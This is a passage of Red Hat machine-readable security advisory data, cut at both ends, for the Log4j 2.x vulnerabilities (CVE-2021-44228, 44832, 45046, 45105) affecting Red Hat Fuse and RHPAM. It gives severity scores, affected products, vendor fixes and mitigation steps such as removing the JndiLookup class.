"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-11T17:56:46+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.11.1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0082" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "RHPAM 7.11.1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.11.1" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2022_0203
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A micro version update for Fuse 7.8, 7.9, and 7.10 is now available for Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed 
under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:0203", "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.08.0", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.08.0" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.09.0", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.09.0" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.10.0", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.10.0" }, { "category": "external", "summary": 
"https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "2034067", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034067" }, { "category": "external", "summary": "2035951", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035951" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0203.json" } ], "title": "Red Hat Security Advisory: Red Hat Fuse 7.8-7.10 security update", "tracking": { "current_release_date": "2024-12-12T01:19:32+00:00", "generator": { "date": "2024-12-12T01:19:32+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2022:0203", "initial_release_date": "2022-01-20T09:26:34+00:00", "revision_history": [ { "date": "2022-01-20T09:26:34+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-01-20T09:26:34+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:19:32+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1", "product": { "name": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1", "product_id": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_fuse:7" } } } ], "category": "product_family", "name": "Red Hat JBoss Fuse" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": 
"2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": 
"external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-20T09:26:34+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "workaround", "details": "For Log4j versions 
\u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-44832", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-28T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2035951" } ], "notes": [ { "category": "description", "text": "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix 
releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: remote code execution via JDBC Appender", "title": "Vulnerability summary" }, { "category": "other", "text": "Log4j 1.x is not impacted by this vulnerability. Therefore versions of log4j shipped with Red Hat Enterprise Linux are NOT affected by this flaw.\n\nFor Elasticsearch, as shipped in OpenShift Container Platform and OpenShift Logging, access to the log4j2.properties configuration is limited only to the cluster administrators and exploitation requires cluster logging changes, what reduced the impact of this vulnerability significantly [0].\n\n[0] https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476#update-jan-6-5", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44832" }, { "category": "external", "summary": "RHBZ#2035951", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035951" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44832", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44832" }, { "category": "external", 
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832" }, { "category": "external", "summary": "https://issues.apache.org/jira/browse/LOG4J2-3293", "url": "https://issues.apache.org/jira/browse/LOG4J2-3293" } ], "release_date": "2021-12-28T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-20T09:26:34+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "workaround", "details": "As per upstream:\n- In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java.\n- Note that only the log4j-core JAR file is impacted by this vulnerability. 
Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: remote code execution via JDBC Appender" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": 
"https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-20T09:26:34+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" }, { "cve": "CVE-2021-45105", "cwe": { "id": "CWE-674", "name": "Uncontrolled Recursion" }, "discovery_date": "2021-12-19T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2034067" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library 2.x. when the logging configuration uses a non-default Pattern Layout with a Context Lookup. 
Attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup and can cause Denial of Service.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Product Security has performed an analysis of this flaw and has classified the Attack Complexity(AC) as High because there are multiple factors involved which are beyond attacker\u0027s control:\n\n- The application has to use the logging configuration using a Context Map Lookup (for example, $${ctx:loginId}) which is a non-default Pattern Layout.\n- The application developer has to use the map org.apache.logging.log4j.ThreadContext in the application code and save at-least one key (for example, ThreadContext.put(\"loginId\", \"myId\");) in the ThreadContext map object.\n- Attackers must also know this saved key name in order to exploit this flaw.\n\nNote that saving keys in this map is a non-essential usage of log4j and just an optional feature provided. Refer to https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup to know more about the Context Map Lookup feature of Log4j.\n\nLog4j 1.x is not impacted by this vulnerability. Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using ONLY the log4j-api JAR file without the log4j-core JAR file are NOT impacted by this vulnerability.\n\n\nDespite including a vulnerable version of Log4j 2.x, this vulnerability is not exploitable in Elasticsearch[0], as shipped in OpenShift Container Platform and OpenShift Logging. 
OpenShift 3.11 specifically does not contain any context lookups:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nThis vulnerability is therefore rated Low for Elasticsearch in OpenShift Container Platform and OpenShift Logging.\n\n[0] https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476#update-december-18-4", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45105" }, { "category": "external", "summary": "RHBZ#2034067", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034067" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45105", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45105" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45105" }, { "category": "external", "summary": "https://issues.apache.org/jira/browse/LOG4J2-3230", "url": "https://issues.apache.org/jira/browse/LOG4J2-3230" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/19/1", "url": "https://www.openwall.com/lists/oss-security/2021/12/19/1" } ], "release_date": "2021-12-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-20T09:26:34+00:00", 
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "category": "workaround", "details": "For Log4j 2 versions up to and including 2.16.0, this flaw can be mitigated by:\n- In PatternLayout in the Log4j logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) like %X{loginId}.\n- Otherwise, in the Log4j logging configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.", "product_ids": [ "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", 
